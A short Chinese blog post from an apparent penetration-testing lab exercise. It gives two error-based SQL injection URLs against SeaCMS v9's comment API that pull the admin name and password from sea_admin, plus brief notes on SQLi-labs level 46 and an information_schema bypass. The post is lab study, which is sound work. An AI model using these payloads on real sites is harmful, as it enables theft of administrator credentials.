当前位置: 首页 > news >正文

渗透测试实验

news 2025/9/15 23:28:16

1、seacmsv9注入管理员密码

获取管理员账号(name)

http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

 

2、获取管理员密码

 http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

 

2、SQLilabs第46关 

 

使用?sort=1/2其排序不同,可以得知使用了orderby语句,存在漏洞。使用python脚本获取数据。

3、information_schema的绕过

使用join的子查询

http://www.lryc.cn/news/543047.html

相关文章:

  • CCA社群共識聯盟正式上線
  • 京东-零售-数据研发面经【附答案】
  • python中的JSON数据格式
  • ubuntu+aarch64+dbeaver安装【亲测,避坑】
  • Java 大视界 -- 基于 Java 的大数据机器学习模型压缩与部署优化(99)
  • vscode中使用PlatformIO创建工程加载慢
  • 微信小程序数据绑定与事件处理:打造动态交互体验
  • 力扣 下一个排列
  • JavaWeb 学习笔记
  • Linux7-线程
  • 在线VS离线TTS(语音合成芯片)有哪些优势-AIOT智能语音产品方案
  • 结构型模式 - 代理模式 (Proxy Pattern)
  • el-select滚动获取下拉数据;el-select滚动加载
  • HTTP GET 请求示例
  • 简单理解Oracle中的latch
  • ubuntu新系统使用指南
  • sage-huga改进SITAN
  • DeepSeek开源周Day1:FlashMLA引爆AI推理性能革命!
  • Git add --- error: Filename too long
  • Python入门12:面向对象的三大特征与高级特性详解
  • 动态链接器(九):.init和.init_array
  • Elasticsearch:使用经过训练的 ML 模型理解稀疏向量嵌入
  • 安宝特方案 | 电力行业的“智能之眼”,AR重新定义高效运维!
  • 【落羽的落羽 数据结构篇】树、二叉树
  • [回顾]从原型链视角解读Vue底层实现Vue VueCompoent VM VC关系
  • springcloud nacos 整合seata解决分布式事务
  • 【算法系列】快速排序详解
  • 神经网络发展简史:从感知机到通用智能的进化之路
  • C语言番外篇(4)--------->goto语句
  • AI 编码 2.0 分析、思考与探索实践:从 Cursor Composer 到 AutoDev Sketch